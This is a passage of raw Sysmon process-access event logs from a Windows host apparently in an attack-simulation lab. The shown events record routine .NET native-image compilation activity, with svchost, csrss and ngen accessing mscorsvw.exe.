C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.449","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001015510D00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6787,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6788,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.496\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.496","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6789,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010B8540D00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010B8540D00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6790,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.605\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FEF80C00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.605","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FEF80C00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6791,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.605\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010FEF80C00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.605","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FEF80C00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001059590D00}\r\nTargetProcessId: 600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001059590D00}","TargetProcessId":"600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.636\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-0010AA5C0D00}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.636","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-0010AA5C0D00}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.d